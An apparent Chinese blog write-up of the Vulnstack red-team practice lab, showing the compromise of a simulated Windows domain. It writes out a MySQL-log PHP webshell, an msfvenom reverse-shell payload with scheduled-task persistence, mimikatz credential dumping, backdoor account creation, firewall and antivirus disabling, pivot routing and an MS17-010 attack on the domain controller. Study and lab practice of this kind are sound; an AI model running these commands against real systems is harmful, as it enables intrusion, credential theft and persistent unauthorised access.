admin管理员组

文章数量:1330725

Vulnstack 红队(一)

靶机为红日安全分享的靶机
靶机下载地址:http://vulnstack.qiyuanxuetang/vuln/detail/2/
笔记参考资料如下:
CSDN——谢公子
FreeBuf——红日安全团队专栏
CSDN——assless

本次网络环境为两个虚拟网络。
192.168.72.0/24为模拟公网环境。(Vmnet2)
192.168.52.0/24为模拟内网环境。(Vmnet1)

攻击者机器与win7的第一张网卡处于Vmnet1。(模拟公网)
win7的另一张网卡与win2k3、win2k8处于Vmnet1。(模拟内网)

首先需要测试网段与网段内是否可以正常通信。
注意!win7在未关闭防火墙时,它可以与其他机器正常通信,但是其他机器会无法使用Ping命令与win7进行通信。

预设步骤如下:

  1. 信息收集;

  2. 漏洞利用;

  3. 内网横向渗透;

    3.1 内网信息收集;
    3.2 内网的漏洞利用。

  4. 报告总结。(本笔记没有)

信息收集

第一步使用Nmap进行存活主机探测:

nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4

根据结果可以得知

root@AnranNewKali001:~#  nmap -sU --script nbstat.nse -p137 192.168.72.0/24 -T4
Starting Nmap 7.80 ( https://nmap ) at 2020-05-30 22:58 CST
Nmap scan report for 192.168.72.1
Host is up (0.00023s latency).

PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 00:50:56:C0:00:0C (VMware)

Host script results:
| nbstat: NetBIOS name: DESKTOP-MMVB7A9, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:c0:00:0c (VMware)
| Names:
|   DESKTOP-MMVB7A9<20>  Flags: <unique><active>
|   DESKTOP-MMVB7A9<00>  Flags: <unique><active>
|_  STUDYGROUP<00>       Flags: <group><active>

Nmap scan report for 192.168.72.129
Host is up (0.00057s latency).

PORT    STATE SERVICE
137/udp open  netbios-ns
MAC Address: 00:0C:29:C4:33:DF (VMware)

Host script results:
| nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| Names:
|   STU1<20>             Flags: <unique><active>
|   STU1<00>             Flags: <unique><active>
|   GOD<00>              Flags: <group><active>
|   GOD<1e>              Flags: <group><active>
|   GOD<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>

Nmap scan report for 192.168.72.254
Host is up (0.00013s latency).

PORT    STATE         SERVICE
137/udp open|filtered netbios-ns
MAC Address: 00:50:56:E6:D6:C6 (VMware)

Nmap scan report for 192.168.72.128
Host is up (0.00015s latency).

PORT    STATE  SERVICE
137/udp closed netbios-ns

Nmap done: 256 IP addresses (4 hosts up) scanned in 32.49 seconds
root@AnranNewKali001:~# nmap -Pn 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:18 CST
Nmap done: 1 IP address (0 hosts up) scanned in 0.50 seconds


暴露在外网的主机为192.168.72.129
使用Nmap扫描开放的端口

root@AnranNewKali001:~# nmap -sC -sV -Pn -p 1-65535 192.168.72.129
Starting Nmap 7.80 ( https://nmap ) at 2020-05-31 09:21 CST
Stats: 0:02:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.93% done; ETC: 09:24 (0:00:00 remaining)
Nmap scan report for 192.168.72.129
Host is up (0.00089s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: GOD)
1025/tcp  open  msrpc        Microsoft Windows RPC
1026/tcp  open  msrpc        Microsoft Windows RPC
1027/tcp  open  msrpc        Microsoft Windows RPC
1028/tcp  open  msrpc        Microsoft Windows RPC
1031/tcp  open  msrpc        Microsoft Windows RPC
3306/tcp  open  mysql        MySQL (unauthorized)
48478/tcp open  msrpc        Microsoft Windows RPC
MAC Address: 00:0C:29:C4:33:DF (VMware)
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:c4:33:df (VMware)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-31T01:23:41
|_  start_date: 2020-05-30T14:30:21

Service detection performed. Please report any incorrect results at https://nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.49 seconds

意识到可以在80、139、445这三个端口进行测试。
目前有两个渗透方向,分别为web服务和msf的漏洞利用。
下面可以使用御剑等工具进行目录扫描。

漏洞利用

写入木马后门
发现有phpmyadmin和yxcms

方法一:使用mysql写shell

phpmyadmin可以mysql日志写shell
数据库存在弱口令
root
root

show variables  like  '%general%';   #查看日志状
SET GLOBAL general_log='on'       #开启general
set global general_log_file='C:/phpstudy/www/yxcms/backdoor.php';     #将路径改为
SELECT "<?PHP @EVAL($_POST['zyx']);?>"       #一句话木马



操作完成后可使用蚁剑进行连接

方法二:从yxcms着手
登陆后发现有默认密码,登陆管理后台。

之后在后台发现可以改写默认模板



保存后使用蚁剑测试

内网信息收集

msf自动编写后门
这里可以使用msf生成后门文件使用蚁剑上传,并添加计划任务。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=10086 -e x86/shikata_ga_nai -i 5 -f exe -o /root/backdoor.exe

windows添加计划任务

schtasks /create /tn solrindex(计划任务名) /tr C:\backdoor.exe /sc minute /mo 1(windows添加计划任务每分钟执行一次)
schtasks /delete /TN solrindex(任务名)/F(删除计划任务)

参考资料为CSDN——assless

添加计划任务后可以使用msf进行监听

msf5 > use multi/handler
#之后根据生成木马的命令进行payload的选择和设置
msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp
#当计划任务被执行的时候,会有会话被msf接收。

提权与加固后门
使用background保存会话后,可以使用sessions -u 1来将会话1变成meterpreter并保存为会话2

在meterpreter下使用getsystem进行提权

之后可以将会话所在id进行迁移(尽量选择64为程序)

migrate pid

获取密码

有时候meterpreter会出现乱码的情况使用chcp 65001即可解决
之后加载mimikatz。

meterpreter > load mimikatz
meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.
meterpreter > wdigest 
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID     Package    Domain        User           Password
------     -------    ------        ----           --------
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;51993    NTLM                                    
0;2492365  Kerberos   GOD           Administrator  hongrisec@2019
0;996      Negotiate  GOD           STU1$          df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03
0;999      Negotiate  GOD           STU1$          df ee 90 18 9c 48 2d 8a e9 98 49 06 01 ca d4 7f 79 c8 19 1f ab e2 63 50 2f 54 c9 08 09 3f f0 49 82 94 6c b1 86 bb 44 57 7c 39 76 46 03 78 c3 e1 a5 74 02 f8 9c 81 b2 5a 12 e5 01 b1 53 18 ed 2c 6d 0f 71 dd 7c 7c 00 8a e7 51 56 5c 3a 11 3a 18 b2 f8 58 b4 08 0d 20 ca b8 00 72 27 be 71 d6 42 9d fb 13 d0 f8 fb f4 5a af 45 af 87 d7 20 cc 4e 68 c9 f9 67 c0 a9 7d 75 66 88 0c 8c 05 c5 88 1a bd a9 79 5b 63 cd a7 3d 19 9b 4d 93 ce 61 b9 68 39 9b 8b bd 53 2e 28 6b 5b 55 21 ee 2e 61 59 b5 4c 77 49 0e eb cc 92 31 94 5f 3a 0d d5 61 8f 1f 38 75 0e 70 bd fc 99 94 a3 80 95 49 b0 b0 84 e5 c6 0a 60 d7 52 ac 25 52 2a 62 f8 e3 8b 2a 72 b2 53 8d eb f0 ce e6 cf 0d 7a 4b 3b 03 4d 6e 74 bb d1 8d 71 32 31 1c 4f 9e b6 f4 85 d8 0d 4b b6 03

获得了administrator的密码。

判断网络
模拟公网:192.168.72.0/24
模拟内网:192.168.52.0/24

判断域信息
net time /domain        #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain        #查看域用户
net view /domain        #查看有几个域
ipconfig /all        #查询本机IP段,所在域等 
net config Workstation  #当前计算机名,全名,用户名,系统版本,工作站域,登陆域 
net user           #本机用户列表
net group "domain computers" /domain   #查看域内所有的主机名 
net group "domain admins" /domain      #查看域管理员 
net group "domain controllers" /domain #查看域控
net localhroup administrators (此条无法使用)          #本机管理员[通常含有域用户]
net user 用户名 /domain                 #获取指定用户的账户信息  
net group /domain                      #查询域里面的工作组 
net group 组名 /domain                  #查询域中的某工作组



C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : stu1
   Primary Dns Suffix  . . . . . . . : god.org
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : god.org
                                       localdomain

Ethernet adapter �������� 4:

   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-51-92-E5
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::d527:9f93:47b9:c7ae%25(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.72.130(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2020��5��31�� 20:12:47
   Lease Expires . . . . . . . . . . : 2020��5��31�� 21:27:48
   Default Gateway . . . . . . . . . : 
   DHCP Server . . . . . . . . . . . : 192.168.72.254
   DHCPv6 IAID . . . . . . . . . . . : 721423401
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : 192.168.72.1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter Npcap Loopback Adapter:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Npcap Loopback Adapter
   Physical Address. . . . . . . . . : 02-00-4C-4F-4F-50
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::b461:ccad:e30f:81ba%24(Preferred) 
   Autoconfiguration IPv4 Address. . : 169.254.129.186(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 
   DHCPv6 IAID . . . . . . . . . . . : 268566604
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                       fec0:0:0:ffff::2%1
                                       fec0:0:0:ffff::3%1
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter �������� 3:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : TAP-Windows Adapter V9 #2
   Physical Address. . . . . . . . . : 00-FF-56-0B-EA-FC
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter �������� 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : TAP-Windows Adapter V9
   Physical Address. . . . . . . . . : 00-FF-44-8D-CB-B5
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter Bluetooth ��������:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Bluetooth �豸(����������)
   Physical Address. . . . . . . . . : 90-78-41-5E-DD-FE
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes

Ethernet adapter ��������:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-51-92-DB
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::9522:e298:7366:33d9%11(Preferred) 
   IPv4 Address. . . . . . . . . . . : 192.168.52.143(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.52.2
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-24-F3-A2-4E-00-0C-29-A7-C1-A8
   DNS Servers . . . . . . . . . . . : 192.168.52.138
                                       8.8.8.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{4DAEBDFD-0177-4691-8243-B73297E2F0FF}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.localdomain:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{448DCBB5-7D61-4538-9C03-66B5CDAD1222}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #3
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #4
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{560BEAFC-DAC4-4687-A564-57790875DC43}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #5
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{43AF3215-AAB6-4AA1-B776-739F7D787259}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #6
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

其中第5条meterpreter中运行失败,可以在蚁剑中使用。

C:\Windows\system32>net time /domain
net time /domain
Current time at \\owa.god.org is 2020/5/31 21:19:39

The command completed successfully.


C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain god.org.


User accounts for \\owa.god.org

-------------------------------------------------------------------------------
Administrator            Guest                    krbtgt                   
ligang                   liukaifeng01             
The command completed with one or more errors.


C:\Windows\system32>net view /domain
net view /domain
Domain

-------------------------------------------------------------------------------
GOD                  
The command completed successfully.


C:\Windows\system32>net config Workstation
net config Workstation
System error 1312 has occurred.

A specified logon session does not exist. It may already have been terminated.




C:\> net config Workstation
计算机名                     \\STU1
计算机全名                   stu1.god.org
用户名                       Administrator
工作站正运行于               
    NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C295192DB)
    NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C295192E5)
    NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)
软件版本                     Windows 7 Professional
工作站域                     GOD
工作站域 DNS 名称            god.org
登录域                       GOD
COM 打开超时 ()            0
COM 发送计数 (字节)          16
COM 发送超时 (毫秒)          250
命令成功完成。

C:\Windows\system32>net group "domain controllers" /domain
net group "domain controllers" /domain
The request will be processed at a domain controller for domain god.org.

Group name     Domain Controllers
Comment        ����������������

Members

-------------------------------------------------------------------------------
OWA$                     
The command completed successfully.


C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain god.org.

Group name     Domain Admins
Comment        ����������Ա

Members

-------------------------------------------------------------------------------
Administrator            OWA$                     
The command completed successfully.


C:\Windows\system32>net group "domain computers" /domain
net group "domain computers" /domain
The request will be processed at a domain controller for domain god.org.

Group name     Domain Computers
Comment        ���뵽���е����й���վ�ͷ�����

Members

-------------------------------------------------------------------------------
DEV1$                    ROOT-TVI862UBEH$         STU1$                    
The command completed successfully.


C:\Windows\system32>net config Workstation
net config Workstation
System error 1312 has occurred.

A specified logon session does not exist. It may already have been terminated.


C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    liukaifeng01             
The command completed with one or more errors.



C:\Windows\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    liukaifeng01             
The command completed with one or more errors.


C:\Windows\system32>net localhroup administrators
net localhroup administrators
The syntax of this command is:

NET
    [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
      HELPMSG | LOCALGROUP | PAUSE | SESSION | SHARE | START |
      STATISTICS | STOP | TIME | USE | USER | VIEW ]

C:\Windows\system32>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
The command completed successfully.

整理后信息如下:

域名:god
域内有三个用户:Administrator、ligang、liukaifeng01
域内三台主机:ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)、OWA
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143

添加内网路由

run get_local_subnets      #获取内网信息
#在全局给指定的session增删路由
route add 192.168.52.0  255.255.255.0  1     #在session1中添加到达192.168.51.0网段的路由
route add 192.168.72.0  255.255.255.0  1     #在session1中添加到达192.168.72.0网段的路由
route add 0.0.0.0       0.0.0.0        1     #在session1中添加到达0.0.0.0/24网段的路由
route del 192.168.52.0  255.255.255.0  2     #在session2中删除到达192.168.52.0网段的路由
route print    #打印路由信息
 
#也可以在进入session下添加路由
run autoroute -s 192.168.52.0/24             #添加到达192.168.52.0网段的路由
run autoroute -s 192.168.72.0/24             #添加到达192.168.72.0网段的路由
run autoroute -s 0.0.0.0/0                   #添加到达0.0.0.0/0的路由
run autoroute -p                             #打印路由信息

Post 后渗透模块

run post/windows/manage/migrate           #自动进程迁移
 run post/windows/gather/checkvm           #查看目标主机是否运行在虚拟机上
 run post/windows/manage/killav            #关闭杀毒软件
 run post/windows/manage/enable_rdp        #开启远程桌面服务
 run post/windows/manage/autoroute         #查看路由信息
 run post/windows/gather/enum_logged_on_users    #列举当前登录的用户
 run post/windows/gather/enum_applications       #列举应用程序
 run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名和密码
 run post/windows/gather/smart_hashdump               #dump出所有用户的hash
run getgui -u hack -p 123
有时候无法使用后渗透模块添加用户
可以使用shell自主添加
net user hack Zyx960706 /add
net localgroup administrator hack /add
netsh advfirewall set allprofiles state off        #关闭防火墙
net stop windefend

域内存活主机探测(系统、端口)

auxiliary/scanner/discovery/udp_sweep    #基于udp协议发现内网存活主机
auxiliary/scanner/discovery/udp_probe    #基于udp协议发现内网存活主机
auxiliary/scanner/netbios/nbname         #基于netbios协议发现内网存活主机
auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000),如果开放了端口,则说明该主机存活


已经探测出138、141、143。

端口扫描

auxiliary/scanner/portscan/tcp           #基于tcp进行端口扫描(1-10000)
auxiliary/scanner/portscan/ack           #基于tcp的ack回复进行端口扫描,默认扫描1-10000端口
端口扫描有时会使会话终端,所以可以上传nmap后在shell中使用nmap扫描。但是要记得清理

服务扫描

auxiliary/scanner/ftp/ftp_version        #发现内网ftp服务,基于默认21端口
auxiliary/scanner/ssh/ssh_version        #发现内网ssh服务,基于默认22端口
auxiliary/scanner/telnet/telnet_version  #发现内网telnet服务,基于默认23端口
auxiliary/scanner/dns/dns_amp            #发现dns服务,基于默认53端口
auxiliary/scanner/http/http_version      #发现内网http服务,基于默认80端口
auxiliary/scanner/http/title             #探测内网http服务的标题
auxiliary/scanner/smb/smb_version        #发现内网smb服务,基于默认的445端口   
use auxiliary/scanner/mssql/mssql_schemadump  #发现内网SQLServer服务,基于默认的1433端口
use auxiliary/scanner/oracle/oracle_hashdump  #发现内网oracle服务,基于默认的1521端口 
auxiliary/scanner/mysql/mysql_version    #发现内网mysql服务,基于默认3306端口
auxiliary/scanner/rdp/rdp_scanner        #发现内网RDP服务,基于默认3389端口
auxiliary/scanner/redis/redis_server     #发现内网Redis服务,基于默认6379端口
auxiliary/scanner/db2/db2_version        #探测内网的db2服务,基于默认的50000端口
auxiliary/scanner/netbios/nbname         #探测内网主机的netbios名字
扫描结果如下:

C:\Nmap>nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138
nmap.exe -sC -sV -Pn -p 1-65535 192.168.52.138

Starting Nmap 7.00 ( https://nmap.org ) at 2020-06-02 09:45 ?D1��������?����??
Nmap scan report for 192.168.52.138
Host is up (0.0027s latency).
Not shown: 65516 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS 6.1.7601
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB1446A)
80/tcp    open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
88/tcp    open  tcpwrapped
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows 98 netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds (primary domain: GOD)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap
3269/tcp  open  tcpwrapped
9389/tcp  open  mc-nmf       .NET Message Framing
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49167/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port445-TCP:V=7.00%I=7%D=6/2%Time=5ED5AFB0%P=i686-pc-windows-windows%r(
SF:SMBProgNeg,61,"\0\0\0\]\xffSMBr\0\0\0\0\x88\x01@\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0@\x06\0\0\x01\0\x11\x07\0\x0f2\0\x01\0\x04A\0\0\0\0\x01\0\0\0\0\0\
SF:xfc\xf3\x01\0J{\xd5\xc2\x7f8\xd6\x01\x20\xfe\x08\x18\0\x88\xed\xe6R\x94
SF:\xff\xdd\xffG\0O\0D\0\0\0O\0W\0A\0\0\0");
MAC Address: 00:0C:29:5C:30:26 (VMware)
Service Info: Host: OWA; OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98

Host script results:
|_nbstat: NetBIOS name: OWA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:5c:30:26 (VMware)
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: owa
|   NetBIOS computer name: OWA
|   Domain name: god.org
|   Forest name: god.org
|   FQDN: owa.god.org
|_  System time: 2020-06-02T09:48:12+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.61 seconds

漏洞利用

 use exploit/windows/smb/ms17_010_psexec


DC已经拿下了,这个靶机很简单适合新手打完DVWA和pikachu之后不想进行

本文标签: Vulnstack